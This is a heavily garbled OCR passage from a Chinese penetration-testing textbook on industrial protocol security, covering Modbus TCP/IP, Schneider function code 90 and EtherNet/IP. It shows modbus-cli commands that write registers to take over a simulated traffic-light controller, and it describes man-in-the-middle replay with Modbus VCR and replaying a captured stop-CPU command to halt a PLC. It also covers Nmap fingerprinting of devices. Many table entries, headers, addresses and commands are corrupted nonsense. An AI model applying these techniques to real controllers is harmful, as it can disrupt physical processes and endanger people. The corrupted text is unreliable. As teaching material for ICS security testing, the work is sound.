Modbus RTU 协 议 不 同 于 Modbus 协 议 族 中 的 其 他 协议 , 例如 Modbus+、Modbus ASCII, Modbus TCP/IP, Modbus over TCP/IP， 以 及 其 他 不 太 常 见 
的 Modbus 协 议 实现 方式 。 本 书 主要 讨论 的 是 Modbus TCP/IP 协 议 。Modbus TCP/IP 和 Modbus over TCP/IP 的 主要 区 别 在 于 ， 在 Modbus TCP/IP 协 议 的 数据 
包 载 和 荷 中 没有 校 验 和 ， 这 一 点 和 Modbus RTU 协 议 很 相似 。 


Modbus TCP/IP 协 议 由 应 用 数据 单元 和 协议 数据 单元 组 成 ， 其 构成 和 Modbus RTU 协 议 也 很 相似 。 但 是 ， 在 Modbus TCP/YIP 协 议 中 ， 应 用 数据 单元 由 
Modbus 应 用 (Modbus Application, MBAP) 首部 和 协议 数据 单元 组 成 。MBAP 首 部 由 事务 标识 符 、 协 议 标 识 符 、 长 度 和 单元 标识 符 组 成 。Modbus TCP/IP 
的 协议 数据 单元 和 Modbus RTU 的 协议 数据 单元 拥有 相同 的 结构 ， 均 包含 功能 码 与 数据 载 倚 。Modbus 协 议 中 的 功能 码 (Function Code, FC) 主要 用 于 确定 数 
据 包 的 功能 。 比 如 ， 下 图 显示 的 是 功能 码 0x2b (43) ， 即 读 取 设 备 标识 信息 功能 码 。 该 功能 码 专门 用 来 请 求 设备 标识 信息 ， 比 如 PLC 的 生产 商 和 型 号 。 


LIT 


BS IAFF NERI KE 单元 标识 符 功能 码 


数据 包 中 的 数据 部 分 含有 每 个 功能 码 所 需 的 具体 信息 。 对 于 读 取 设 备 标识 信息 功能 码 来 说 ， 数 据 部 分 告诉 设备 请 求 的 是 认证 信息 中 的 哪 一 部 分 内 容 。 使 用 
Nmap 扫 描 器 的 modbus-discover 脚 本 可 以 收集 这 些 信息 (https://nmap.org/nsedoc/scripts/modbus-discover.html) 。 


starting Nmap 6.4/ ( http://nmap.org ) at 2015-12-30 11:20 EST 
Nmap scan report for 192.168.63.25: 

Host is up (0.0013s Latency) 

PORT STATE SERVICE 


502/tcp open modbus 

| modbus-discover: 

| Positive response for sid = 0x1 

| SLAVE ID DATA: 

| DEVICE IDENTIFICATION: Schneider Electric SAS 140 NOE 771 01 V4.90 


Modbus-discover 脚 本 还 可 以 尝试 收集 从 站 标识 符 (Slave ID) 的 信息 。 从 站 标识 符 信 息 可 以 使 用 功能 码 17 (0x11) 获得 ， 即 报告 从 站 标识 符 信息 功能 
Modbus 标 准 协议 使 用 的 功能 码 被 大 多 数 设备 所 支持 。 这 些 功 能 码 都 在 Modbus 标 准 协 议 中 进行 了 定义 ， 如 表 5-1 所 示 。 


表 5-1 Modbus 功 能 码 


功 能 码 功能 描述 
l 读 取 线圈 状态 
2 读 取 离散 输入 
3 BERS aT FF AN 
4 读 取 输 入 寄存 需 
5 写 入 单线 圈 
6 写 人 单 保 持 寄 人 存 硕 


7 读 取 异常 状态 
8 Bk 


11 PRUETT Bait 

12 获取 事件 记录 

14 读 取 设备 标识 

15 写 入 多 个 线圈 

16 EAB MRE AY FF tt 
17 报告 从 站 标识 符 

20 读 取 文件 记录 


21 写 人 文件 记录 
22 Be Wc AYAT AN 
23 读 / 写 多 个 寄存 器 
24 读 取 FIFO 队列 
43 读 取 设 备 标识 


作为 早期 协议 ，Modbus 缺 少 能 够 阻止 普通 攻击 的 很 多 现代 安全 特性 ， 这 些 普通 攻击 包括 发 送 未 授权 指令 和 重 放 攻击 等 类 型 。 对 于 不 同 的 功能 码 ， 数 据 包 中 
数据 部 分 的 长 度 根据 功能 码 所 请 求 的 信息 内 容 而 改变 。 比 如 ， 在 对 Modbus 线 圈 的 读 取 请 求 中 ， 功 能 码 1 的 数据 包 中 的 数据 部 分 包括 了 指向 开始 读 取 位 置 的 引用 编 
号 (reference number) 以 及 要 读 取 的 线圈 数 。 下 图 是 使 用 Wireshark 捕 获 到 的 样本 数据 包 。 
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ee il == 
Filter: | tcp.port == 502 z | Expression... Clear Apply Save 
No. Time Source Destination Protocol Length Info 


3 0.000500009 一 168 . 138. 129 10.1.1.139 TCP 54 40836-502 [ACK] Seq=1 Ack=1 Win=29200 Len=0 
5 0.001147000 10.1.1.130 192. 168. 130. 129 TCP 60 502-456836 [ACK] Seq=1 Ack=13 win=64240 Len=0 
6 0.001949000 10.1.1.130 192. 168. 130. 129 Modbus/T( 64 Response: Trans: l; Unit: 1, Func: 1: Read Coils 
7 0.002004000 192.168.130.129 10.1.1.130 TCP 54 46836-502 [ACK] Seq=13 Ack=11 Win=29200 Len=0 
.002514000 10 30 192. 168.130 2 1? 60 502-46836 [AC ea= k=14 Win=64239 Len=0 
n arne Protocol Version 4, Src: IS 5. 128 5. O (10-1.1.1X 
» Transmission Control Protocol, Src eres “46836 (iene, Dst Pate 502 ne), Seq: 1, Ack: 1, Len: 12 
~ Modbus/TCP se ees SN ee 


Transaction Identifier: 1 
Protocol Identifier: O 
Length: 6 
Unit Identifier: 1 
~ Modbus 
Function Code: Read Coils (1) 
Reference Number: 100 
Bit Count: 5 
0010 00 34 95 40 40 00 40 06 56 d7 cO a8 82 k n 
0020 Ol 82 b6 f4 01 f6 2a b2 97 60 35 "a 
0030 72 10 61 4f 00 00 00 01 00 00 00 


0040 00 05 oe | 


有 很 多 技术 可 以 对 Modbus 线 圈 和 寄存 器 进行 读 写 。 由 于 数据 包 非 常 简单 ， 可 以 采用 任意 的 编程 语言 比如 Python 和 Ruby 轻 松 地 实现 数据 包 的 手工 构造 。 在 这 
些 脚 本 语言 中 ， 还 有 诸如 pymodbus 和 rmodbus 之 类 的 函数 库 可 以 用 于 数据 包 的 构造 、 接 收 和 解析 。Sscapy (http://www.secdev.org/projects/scapy/) 也 是 一 


个 能 够 简化 网 络 数 据 包 操作 过 程 的 Python 工具 ，Digital Bond 公 司 (http://www.digitalbond.com) 也 为 其 开 友 了 Modbus 插 件 。 不 过 在 大 多 数 情况 下 ， 最 简单 
便捷 的 方法 是 使 用 客户 端 来 查询 信息 。 工 控 系 统 环境 下 ， 渗 透 测 试 人 员 使 用 的 查询 客户 端 是 Modbus-cli (https://github.com/tallakt/modbus-cli) 。 使 用 
Modbus-dli 只 需要 一 条 简单 的 命令 就 可 以 对 线圈 和 寄存 器 进行 读 写 。 


root@kalt: ~H modbus read 10-171.130 %M100 5 


rootalat ~ 六 


Modbus 协 议 中 比较 困难 的 事情 之 一 就 是 需要 弄 清楚 每 一 个 线圈 和 寄存 器 的 用 途 。 与 其 他 协议 不 同 ，Modbus 协 议 中 未 对 这 些 值 进行 描述 。 根 据 目的 的 不 
同 ， 可 以 开展 进一步 探测 ， 以 确定 是 否 能 够 针对 设备 执行 某 些 功 能 的 逻辑 收集 到 更 多 人 信息。 例如， 如 果 能 够 友 现 某 一 人 逻辑 通过 保持 寄存 器 x 实现 对 阀门 的 控制 ， 那 
么 就 可 以 在 感 兴趣 的 地 方 制造 些 麻 烦 。 使 用 仿真 系统 比如 CybatiWorks (https://cybati.org/cybatiworks) ， 可 以 在 非 生 产 系统 中 尝试 收集 这 些 信息 并 进行 测 
试 。 如 果 能 够 访问 人 机 界面 (HMI) ， 那 么 改变 线圈 和 寄存 器 所 造成 的 影响 将 更 加 显而易见 。 下 面 ， 使 用 CybatiWorks 系 统 并 以 交通 信号 灯 控 制 面板 作为 一 个 非 

常 简单 的 人 机 界面 实例 进行 介绍 ( 见 下 图 ) ， 从 图 中 可 以 看 到 系统 当前 正 处 于 自动 模式 。 


CYBATI Traffic Light ~ ModbusTCP -一 一 | 


p i Jh 
Ja — —" 
r _ 
j Me 一 
F k, = i 
F 更 局 ”> 
al oo at bint = ` ne 


强制 东西 路 品 ( 副 )| 


内 炬 模式 = 


Haa J 北 / 南 主 灯 东 / 西 副 灯 | 


通过 进行 系统 查询 ， 可 以 确定 哪个 保持 寄存 器 与 该 设置 相关 联 。 查 询 过 程 可 能 需要 一 段 时 间 ， 在 某 些 情况 下 ， 试 图 查询 系统 中 的 无 效 地 址 将 会 报错 。 一 旦 确 
合适 的 寄存 器 ， 就 可 以 看 到 维持 系统 当前 状态 所 设置 的 数值 。 如 下 图 所 示 ， 其 中 有 一 个 寄存 器 设置 为 1， 导 致 系统 处 于 自动 模式 ， 所 以 信号 灯 将 以 固定 的 频率 


进行 变换 。 


»ot@kali:~# modbus read 172.16.192.30 %MWO 5 


如 果 想 更 改 该 模式 ， 令 设备 不 要 自动 切换 信号 灯 ， 需 要 将 地 址 4 处 保持 寄存 器 的 数值 设置 为 0。 在 这 个 案例 中 ， 设 备 需要 多 次 写 入 才能 取消 自动 设置 。 通 过 一 
些 简 单 的 测试 友 现 ， 这 可 能 是 由 系统 内 肉 的 逻辑 所 造成 的 ， 取 消 的 前 提 是 必须 先 激活 菜 个 特定 信号 灯 。 使 用 write 命令 ， 将 除 %MW3 之 外 的 所 有 寄存 器 都 设置 为 
1; %MW3 保 持 为 0 的 原因 是 %MW3 对 应 人 机 界面 上 的 闪烁 按钮 ， 无 论 其 他 寄存 器 设置 成 什么 值 ， 只 要 %MW3 为 0 融会 令 所 有 的 灯 处 于 闪烁 状态 。 一 旦 写 入 成 
功 ， 再 次 恢复 所 有 数值 为 0 将 使 人 机 界面 中 的 设置 无 效 。 下 面 这 张 表 显示 了 执行 完 write 命 令 之 后 的 数值 改变 情况 。 图 ?5-2 为 所 有 数值 设置 为 0 的 界面 。 
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licYBatTi* 
Traffic Light 


Control Panel 


Force N-S Intersection (Main) | 

Force E-W Intersection (Side) | 
Blinking | 
Automatic | 


图 5-2 ”使 用 Modbus 协 议 读 取 Cybati 交 通信 号 灯 系 统 的 设置 信息 


5.1.1 Modbus 协议 中 间 人 攻击 


mets fe : 


bz Aa Jj: 
风险 评级 : 


攻击 类 型 主要 包括 记录 和 重 放 攻 击 。 之 前 提 到 的 Cybati 交 通信 号 灯 系 统 遭 受 中 间 人 攻击 的 例子 表明 攻击 者 也 能 


Modbus 协 议 易 于 遭受 中 间 人 攻击 (MiTM) , 
够 以 同样 的 方式 控制 系统 ， 但 是 展示 在 人 机 界面 上 的 样子 却 好 像 是 交通 信号 灯 系 统 仍 处 在 与 原来 相同 的 状态 ， 并 且 从 来 没有 改变 过 。 这 将 拖延 系统 操作 员 友 现 异 


常 并 上 友 出 攻击 警告 的 时 间 。 从 开源 软件 到 商用 系统 ， 有 很 多 工具 可 以 对 Modbus 网 络 协议 发 起 中 间 人 攻击 。 开 源 工具 Modbus 
VCR (https://github.com/reidmefirst/modbus-vcr/) 就 是 其 中 之 一 。Modbus VCR 与 Ettercap 工 具 配 合 使 用 可 以 记录 Modbus 协 议 的 流量 并 进行 重 放 ， 从 而 


使 得 系统 在 某 段 记录 下 来 的 时 间 区 间 内 仍 表 现 为 正常 运行 。 


5.1.2 ”Schneider 终止 CPU 运行 攻击 


VAL f Tie : 


gM TZ) : 
JX Fit IER : 


Modbus 协 议 中 还 包括 了 一 些 未 公开 的 功能 码 ， 这 些 功能 码 是 厂商 所 使 用 的 专 有 功能 码 。 其 中 一 个 非常 好 用 的 专 有 功能 码 实例 就 是 Schneider Electric 公 司 的 
功能 码 90 (0x5a) 。 对 于 大 多 数 专 有 协议 而 言 ， 必 须 使 用 工程 软件 才能 够 了 解 这 些 协议 的 工作 方式 。Basecamp 项 目 是 Digital Bond 公 司 负责 的 一 个 著名 项 目 。 


Digital Bond 公 司 是 一 家 工控 系统 安全 研究 咨询 公司 ， 该 公司 借助 之 前 发 布 的 一 个 Metasploit 模 块 最 先 揭示 出 了 功能 码 90 的 部 分 问题 ， 该 Metasploit 模 块 包含 在 


Metasploit 的 主编 译 版 本 之 中 (https://www.rapid7.com/db/modules/auxiliary/admin/scada/modicon command) 。 在 Basecamp 项 目 中 ， 功 能 码 90 人 允许 


能 ， 比 如 终止 CPU 运行 。stop CPU 命令 是 使 用 工程 软件 (Unity Pro) 和 一 个 Modicon PLC 在 对 流量 进行 记录 的 过 程 中 偶然 


厂商 实现 Modbus 协 议 原 本 没有 的 功能 
发 现 的 。 融 像 之 前 讨论 过 的 一 样 ， 即 使 数据 包 未 被 修改 ，Modbus 协 议 也 会 遭受 重 放 攻 击 ， 而 功能 码 90 也 是 如 此 。 通 过 对 捕获 的 数据 包 进 行 重 放 ，PLC 中 的 CPU 


终止 运行 就 好 像 工程 软件 执行 了 stop CPU 命 令 一 样 ， 结 果 导 致 逻辑 暂停 执行 ，PLC 也 将 停止 执行 所 有 功能 ， 如 图 5-3 所 示 。 如 果 PLC 所 控制 的 设备 是 实时 控制 的 ， 
那么 终止 CPU 运 行 攻击 将 带 来 灾难 性 的 后 果 。 


Disconnect 
Set Address... 


— m Standard Mode 


S, Simulation Mode 


Compare... 
手 让 Transfer Project to PLC Ctrl+L 
#9) Transfer Project from PLC Ctrl+Shift+L 


E 0 : BMX XBP 0800 
-M (P) (P) : BMX CPS 20 


Transfer Data from File to PLC 


0 : BMX P34 1000 Transfer Data from PLC to File 
1: BMX NOE 0110.2 
7 = BMX DDI 1507 Safety/Maintenance Ctrl+Shift+M 
3: BMX DDO 1602 Stop Ctrl+R 
4: BMX AMI 0410 Init 
5 : BMX AMO 0210 一 
6 Update Upload Information 
7 
=E Derived | Data Types Update Init Values with Current Values. 


TS Variables & FB instances Project Backup... 
-iy Elementary Variables 

+ Derived Variables | 
= 10 Derived Variables state Ram Viewer 


Memory Consumption... 


图 5-3 Unity Pro 软 件 中 终止 CPU 运行 的 菜单 选项 


通过 查看 工程 软件 和 PLC 之 间 的 通信 记录 ， 可 以 看 出 协议 中 的 哪些 信息 有 效 。 在 功能 码 90 的 实例 中 ，PLC 的 大 量 相 关 信息 被 泄露 ( 见 图 5-4) ， 其 中 甚至 包括 
上 一 个 加 载 程序 和 逻辑 的 机 器 主机 名 。 当 对 PLC 和 工程 软件 之 间 的 流量 进行 检查 时 ，Modbus 协 议 中 的 信息 很 有 可 能 是 未 经 编码 的 字符 串 ， 导 致 设备 的 响应 数据 能 
够 被 轻松 地 解析 出 来 。 


例如 ， 在 某 个 数据 包 ， 或 者 是 在 由 工程 师 构 造 的 用 于 确定 PLC 配 置信 息 的 整个 数据 包 里 ，PLC 加 载 的 名 字 由 PLC 传 输 到 工程 软件 中 。 在 图 5-4 所 示 的 例子 中 ， 
项 目 名 称 为 “Project”， 十 六 进 制 表示 为 50726f6a656374。 经 过 对 数据 包 的 进一步 分 析 ， 十 入 进 制 表示 080000 为 项 目 修订 号 ， 只 不 过 是 采用 了 低地 址 表示 法 ， 
转换 后 的 值 为 0.0.8。0x0c3b0c0e01de07 是 项 目 文件 的 最 后 一 次 修改 的 日 期 。 如 下 表 所 示 ， 可 以 将 该 时 间 戳 分 解 为 小 时 、 分 钟 、 秒 、 日 、 月 和 年 ， 同 样 也 是 采用 
了 低地 址 表示 法 。 


Frame 44: 111 bytes on wire (888 bits), 111 bytes captured (888 bits) 
Ethernet II, Src: Schneide_14:f2:4f (00:00:54:14:f2:4f), Dst: WistronI_91:54:ab (3c:97:0e:91:54: ab) 
Internet Protocol Version 4, Src: 192.168.63.253 (192.168.63.253), Dst: 192.168.63.201 (192.168.63.201) 
Transmission Control Protocol, Src Port: 502 (502), Dst Port: 31460 (31460), Seq: 340, Ack: 293, Len: 57 
Modbus/TCP 
Modbus 

Function Code: Unity (Schneider) (90) 

Data: 00fe020500009888010000020500009888010000020c3b0c... 


3c 97 Qe 91 54 ab 00 00 54 14 f2 4f 08 00 45 00 

00 61 19 bf 00 00 40 06 5f c1 c@ a8 3f fd co a8 

3f c9 01 f6 7a e4 92 14 91 11 ca 08 70 28 50 18 

10 00 ed 34 00 00 09 86 00 00 00 33 00 5a 00 fe 

02 05 00 00 98 88 01 0O 00 02 05 00 90 98 88 01 

00 00 02|0c 3b Oc ðe 01 de 07 02 Ac [3b Oc ðe 01 
08 00 00| 00 08 50 72 6f 6a 65 63[74 00 


项 目 文件 上 
一 次 修改 的 时 间 


图 5-4 ”功能 码 90 通 信和 实例 


5.1.3 Schneider 功能 码 90 鉴 别 攻击 


MITE: 


Xl BE TER : 


采用 同样 的 技术 ，Digital Bond 公 司 在 随后 的 Redpoint 项 目 (https://github.com/digital bond/Redpoint/blob/master/modicon-info.nse) 中 ， 通 过 对 
PLC 进 行 查 询 挖掘 出 了 更 多 的 信息 ， 包 括 PLC 在 设施 中 可 能 部 署 的 位 置 。Modbus Nmap 脚 本 通过 Modbus 协 议 的 功能 码 43 和 功能 码 90 与 设备 通信 ， 收 集 信 息 帮 
助 建立 设备 简况 (profile) ， 使 用 协议 自 带 的 本 地 命令 可 以 安全 地 从 设备 中 提取 信息 ， 且 不 会 对 设备 造成 影响 。 


Starting Nmap 6.4/7 ( http://nmap.org ) at 2015-12-30 11:28 EST 
Nmap scan report for 192.168.63.253 

Host is up (0.0012s Latency). 

PORT STATE SERVICE 

202/tcp open Modbus 

| modicon-info: 

| Vendor Name: Schneider Electric SAS 

| Network Module: 140 NOE //1 Ol 

| CPU Module: 140 CPU 311 10 

| Firmware: V4.90 

| Project Information: Project - GIKY V4.1 
| Project Revision: 0.0.8 

| Project Last Modified: 1/14/2014 12:59:12 


5.2 EtherNet/IPtH i 


同 Modbus 协 议 相 比 ，20 世 纪 90 年 代 开 始 设计 的 EtherNet/IP 协 议 是 一 个 现代 化 程度 更 高 的 协议 。 控 制 网 国际 有 限 公 司 (ControlNet International) 的 一 个 
技术 工作 组 联合 ODVA (Open DeviceNet Vendor Association， 开 放 式 DeviceNet 供 应 商 协会 ) 共同 构建 了 EtherNet/IP 协 议 。EtherNet/IP 建 立 在 通用 工业 协 
议 (Common Industrial Protocol, CIP) 之 上 。 主 要 的 自动 化 系统 制造 商 Rockwell 公 司 与 Allen-Bradley 公 司 围绕 EtherNet/IP 协 议 实现 了 设备 的 标准 化 ， 其 他 
制造 商 (如 Omron) 也 在 其 设备 中 提供 了 对 EtherNet/IP 协 议 的 支持 。EtherNet/IP 逐 渐变 得 流行 起 来 ， 尤 其 是 在 美国 地 区 。 作 为 一 项 工业 协议 ，CIP 在 其 他 串 行 
协议 中 也 都 有 应 用 ， 例 如 DeviceNet、ControlNet 以 及 EtherNet/IP 等 。 昌 然 EtherNet/IP 协 议 比 Modbus 协 议 的 现代 化 程度 更 高 ， 但 它 也 存在 安全 隐患 ， 容 易 导 
致 协议 遭受 攻击 。EtherNet/IP 协 议 通 常 运行 在 TCP 和 UDP 的 端口 44818 之 上 。 但 是 ，EtherNet/IP 协 议 还 用 到 了 另 一 个 端口 ， 即 TCP 和 UDP 的 2222 端 口 。 采 用 
2222 端 口 的 原因 在 于 EtherNet/IP 使 用 了 隐 了 式 (implicit) 和 显 式 (explicit) 报 文 。 显 式 报 文 也 称 为 客户 端 /服务 端 通信 报 文 (client/server messaging) ， 而 隐 
式 报 文通 常 也 称 为 MO 报 文 (MO messages) 。 


EtherNet/IP 协 议 对 CIP 进 行 封装 后 可 用 于 以 太 网 。EtherNet/IP 协 议 的 CIP 帧 中 包括 了 命令 、 数 据点 以 及 报 文 信息 。CIP 帧 包括 CIP 设 备 概要 信息 层 、 应 用 层 、 
表示 层 和 会 话 层 。 数 据 包 中 的 其 他 内 容 则 包括 EtherNet/IP 帧 ， 主 要 用 于 对 通过 以 太 网 传输 的 CIP 帧 进行 设置 。EtherNet/IP 协 议 数据 包 的 结构 如 图 5-5 所 示 。 


CIP 协 议 规范 对 数据 包 结 构 进行 了 明确 清晰 地 定义 ， 如 图 5-6 所 示 。 这 意味 着 基于 EtherNet/IP 协 议和 CIP 协 议 的 每 套 设 备 都 必须 严格 按照 规范 中 所 定义 的 命令 
进行 工作 。CcCIP 协 议 封 装 首部 包括 EtherNet/IP 协 议 首 部 信息 内 的 字段 : 


命令 ”与 通用 工业 协议 规范 中 某 条 特定 指令 相关 的 两 个 字 节 整数 。 在 CIP 协 议 中 ， 即 便 对 于 不 认识 的 指令 ， 设备 也 必须 接收 ， 并 且 确 保 在 不 会 断 开 连 接 的 情 
况 下 进行 异常 处 理 。 


‘KE ”表示 数据 包 中 数据 部 分 长 度 的 两 个 字 节 整数 ; 当 数 据 包 中 不 存在 数据 部 分 时 ， 该 字段 值 为 0， 例 如 请 求 数据 包 。 


电机 启动 器 | 气压 阀 | 交 流 变频 器 | 位 置 
控制 右 | 其 他 设备 概要 信息 


CIP 应 用 层 应 用 对 和 象 库 
CIP 协 议 
CIP 数 据 管 理 服 务 显 式 报 文 、L/O 报 文 


CIP 报 文 路 由 、 连 接管 理 


EtherNet/IP 
协议 


以 太 网 (IEEE8023 ) 


图 5-5 EthetNet/IP 数 据 包 结构 


63 00 | 0000 | 00000000 | 00000000 | 0000 | 00 006a 0e be 64 |00 00 00 00/00 00 00 00 00 00 


命令 会 话 句 柄 状态 码 RAIER ”发送 方 上 下 文 选项 命令 相关 数据 
长 度 


图 5-6 ”详细 的 CIP 协 议 数据 包 结 构 
. 会 话 句 柄 ”由 目标 设备 生成 ， 并 且 返 回 至 会 话 发 起 方 。 该 句柄 将 在 与 目标 设备 的 后 续 通 信 中 使 用 。 


` 状态 码 ”反映 了 数据 包 接收 方 执 行 所 发 送 的 特定 命令 的 能 力 。 状 态 码 为 0 表示 命令 成 功 执行 。 在 所 有 的 请 求 数 据 包 中 ， 状 态 码 都 是 9。 状态 码 的 其 他 响应 值 


0x0001 无 效 或 不 支持 的 命令 

. 0x0002 接 收 方 处 理 命令 的 资源 不 足 

- 0x0003 格 式 异 常 或 数据 不 正确 

- 0x0065 接 收 到 无 效 的 数据 长 度 

` 友人 这 万 上 下 文 ” 命 令 发 送 方 将 生成 六 个 字 节 的 值 ， 接 收 方 不 对 该 数值 进行 政 动 并 将 其 返回 。 
选项 ”该 字段 值 应 始终 为 0;， 如 果 该 字段 值 不 为 0， 数 据 包 将 被 丢弃 。 

: 命令 相关 数据 ”该 字段 内 容 根据 接收 和 发 送 的 命令 自身 情况 而 政变 。 


如 果 发 送 方 是 工程 师 站 ， 那 么 友 送 方 和 接收 方 之 间 的 大 多 数 通 信 会 话 开始 时 都 会 使 用 List Identity 命 令 。 如 图 5-7 所 示 的 数据 包 示 例 中 ， 命 令 是 0x63， 即 List 
Identity， 与 之 相关 的 发 送 方 上 下 文 的 值 为 0x00006a0ebe64。List ldentity 命 令 的 十 六 进 制 表示 是 0x63， 该 命令 很 像 Modbus 协 议 中 的 功能 码 43， 主 要 用 于 设备 
言 息 的 查询 ， 例 如 厂商 、 产 品 、 序 列 号、 产品 编码 、 设 备 类 型 和 修订 版 本 号 等 信息 。 使 用 GitHub 上 pyenip 项 目 中 的 Python 脚 本 
ethernetip.py (https://github.com/paperwork/pyenip/blob/master/ethernetip.py) ， 可 以 查询 EtherNet/IP 设 备 信 息 。 该 脚本 默认 情况 下 不 会 对 某 些 响应 


进行 解析 ， 但 是 对 于 其 当前 版 本 ， 一 旦 取消 脚本 底部 对 #testENIP () 函数 调用 的 注释 ，ethernetip.py 脚 本 就 会 太 送 和 接收 List ldentity 命 令 。 当 运行 该 脚本 时 ， 
可 以 通过 Wireshark 来 捕获 设备 的 请 求 和 响应 数据 包 ， 用 以 查看 设备 信息 。 


Destination Protocol Lengtt Info 


192.168.71.130 10.1.1.35 TCP 54 33867-44818 [ACK] Seq=1 Ack=1 Win=1460@ Len=0 
192.168.71.130 10.1.1.35 ENIP 78 List Identity (Req) 
10.1.1.35 192.168.71.130 TCP 60 44818-33867 [ACK] Seq=1 Ack=25 Win=6424@ Len=0 
10.1.1.35 192.168. 71.130 ENIP 129 List Identity (Rsp), 1756-ENBT/A 
192.168.71.130 10.1.1.35 TCP 54 33867-44818 [ACK] Seq=25 Ack=76 Win=1460@ Len=0 
Frame 6: 129 bytes on wire (1032 bits), 129 bytes captured (1032 bits) 
Ethernet II, Src: Vmware_e8:0c:f9 (00:50:56:e8:0c:f9), Dst: Vmware_@6:99:c3 (00:0c:29:06:99:c3) 
Internet Protocol Version 4, Src: 10.1.1.35 (10.1.1.35), Dst: 192.168.71.13@ (192.168.71.130) 
Transmission Control Protocol, Src Port: 44818 (44818), Dst Port: 33867 (33867), Seq: 1, Ack: 25, Len: 75 
EtherNet/IP (Industrial Protocol), Session: 0x@0000000, List Identity 


图 5-7 ”捕获 的 EtherNet/IP 身 份 识 别 请 求 数据 包 


由 于 ethernetip.py 脚 本 的 代码 量 约 有 1000 余 行 ， 因 此 在 本 书 中 不 提供 上 述 示例 中 的 脚本 代码 。 读 者 可 以 通过 访问 下 面 的 GitHub 链 接 来 获取 该 脚本 : 
(https://github.com/paper-work/pyenip/blob/605ad6d026865e3378542d4428ec975e7c26d2e4/ethernetip.py) 。 


5.2.1 ”EtherNet/IP 协 议 身 份 鉴 别 请 求 攻击 


MITH : 


作为 Redpoint 项 目的 一 部 分 ，Digital Bond 公 司 开发 了 一 个 同 pyenip 脚 本 很 类 似 的 脚本 来 提取 设备 信息 。Redpoint 项 目 中 的 脚本 使 用 了 List Identity 
Request 命 令 ， 并 能 够 对 Nmap 中 的 信息 进行 解析 。 该 脚本 一 个 有 趣 的 地 方 在 于 命令 相关 数据 域 (command specific data) 中 识别 出 的 字段 采用 了 套 接 字 地 址 
结构 。 数 据 包 中 的 这 部 分 数据 揭示 了 目标 设备 的 TCP 或 UDP 端口 以 及 IP 地 址 ， 也 就 是 远程 设备 实际 的 |P 地 址 和 端口 ， 即 使 是 经 过 网 络 地 址 转换 ， 这 些 内容 也 将 一 
览 无 余 。 通 过 使 用 Shodan 搜 索引 擎 进行 搜索 (https://www.shodan.io/search?query=port%3A44818) ， 我 们 发 现 很 多 设备 的 |P 信 息 同 实际 扫描 得 到 的 |P 信 息 
存在 区 别 ， 因 此 推断 出 大 部 分 设备 都 是 处 在 私有 网 络 中 ， 而 没有 直接 暴露 在 互联 网 上 。 正 如 对 某 套 CompactLogix PLC 设 备 进行 Nmap 扫 描 后 的 扫描 结果 所 显示 
出 的 ， 如 果 两 个 IP 地 址 不 一 致 ， 则 说 明 被 扫 摘 的 系统 部 署 在 路 由 器 或 防火 墙 之 后 。 


Nmap scan report for 1@.1.3.4 

Hest is up (1.3s Latency). 

PORT STATE SERVICE 

44818/tcp open EtherNet-IP-2 

| enip-info: 

| Vendor: Rockwell Automation/ALllen-Bradley (1) 
| Product Name: 1/69-L18ER/A LOGIX5318ER 

| serial Number: Ox964b3d96 

| Device Type: Programmable Logic Controller (14) 
| Product Code: 154 

| Revision: 21.11 

| Device 1P: 192.168 .2-16 


上 图 显示 的 这 些 信息 里 有 一 部 分 内 容 是 两 个 字 节 的 整数 ， 例 如 厂商 标识 符 (Vendor ID) ， 可 以 将 这 两 个 字 节 的 整数 转换 为 EtherNet/IP 协 议 支 持 的 注册 三 商 
列表 。 但 该 列表 通常 是 不 向 公众 公开 的 。 对 Wireshark 进 一 步 分 析 发 现 ， 厂 商标 识 符 在 经 过 解析 的 数据 包 中 直接 转换 成 三 商 名 。 这 说 明 Wireshark 明 白 这 个 值 的 合 
义 ， 并 且 知 道 如 何 将 该 值 转换 为 相应 的 厂商 名 。 通 过 搜索 GitHub 上 提供 的 Wireshark 源 代码 ， 如 下 图 所 示 ， 其 中 解析 模块 的 源 代码 揭示 了 可 以 将 哪些 数值 转换 为 
对 应 的 厂商 ， 从 而 帮助 我 们 得 到 易于 用 户 理 解 的 设备 厂商 名 。Wireshark 是 解析 工控 系统 协议 的 宝贵 资源 ， 特 别 是 在 这 些 工控 协议 通常 都 是 专 有 协议 的 情况 下 。 


/* Translate Vendor IDs */ 
static const value_string cip_vendor_vals[] = { 
{ "Reserved" }, 
"Rockwell Automation/Allen-Bradley” }, 
"Namco Controls Corp." }, 
"Honeywell Inc." }, 


"Rockwell Automation/Reliance Elec." }, 


{ 
{ 
{ 
{ | "Parker Hannifin Corp. (Veriflo Division)" }, 
{ 
{ 


"Reserved" }, 


使 用 诸如 List Identity 之 类 的 命令 ， 只 需要 对 其 稍 加 改动 就 可 以 实现 数据 包 的 重 放 ， 或 者 根本 不 需要 对 数据 包 进 行 修改 。 会 话 句柄 将 被 设置 为 0， 并 且 由 于 该 
命令 只 是 简单 的 友 送 命令 和 接收 系统 响应 命令 ， 因 此 无 需 建立 会 话 。 如 果 想 与 设备 进一步 通信 ， 则 需要 执行 Register Session 命 令 (0x65) 。Register Session 命 
令 用 于 设置 会 话 句柄 标识 符 (Session Handle ID) 。 一 旦 协商 完成 ， 将 使 用 该 标识 符 进 行 剩余 会 话 。 如 下 图 所 示 ， 会 话 注册 的 请 求 数据 包 中 使 用 了 标准 标识 符 
O (0x00000000) ， 而 目标 设备 则 使 用 生成 的 会 话 句 柄 作为 响应 ， 即 0x03A566BB。 


Time Source Destination Protocol Lengtr Info 


192.168.210.200 192.168.210.5 TCP 60 36742-44818 [ACK] Seq=1 Ack=1 Win=16000 Len=0 
192.168.210.200 192.168.210.5 ENIP 82 Register Session (Req), Session: 0x00000000 
192.168.210.5 192.168.210.200 ENIP 82 Register Session (Rsp), Session: 0x03A566BB 
192.168.210.200 192.168.210.5 CIP 100 Get Attribute All 

192.168.210.5 192.168.210.200 CIP 137 Success 

192.168.210.200 192.168.210.5 CIP .. 154 Forward Open 


Frame 6: 82 bytes on wire (656 bits), 82 bytes captured (656 bits) 
Ethernet II, Src: FactsEng_05:58:70 (60:52:d0:05:58:70), Dst: WagoKont_08:f8:7c (00:30:de:08:f8:7c) 


Internet Protocol Version 4, Src: 192.168.210.200 (192.168.210.200), Dst: 192.168.210.5 (192.168.210.5) 
Transmission Control Protocol, Src Port: 36742 (36742), Dst Port: 44818 (44818), Seq: 1, Ack: 1, Len: 28 
EtherNet/IP (Industrial Protocol), Session: 0x®0000000, Register Session 


00 30 de 08 f8 7c 60 52 dð 05 58 70 08 00 45 00 
00 44 a6 5c 00 00 40 06 ae 38 c0 a8 d2 c8 cB a8 
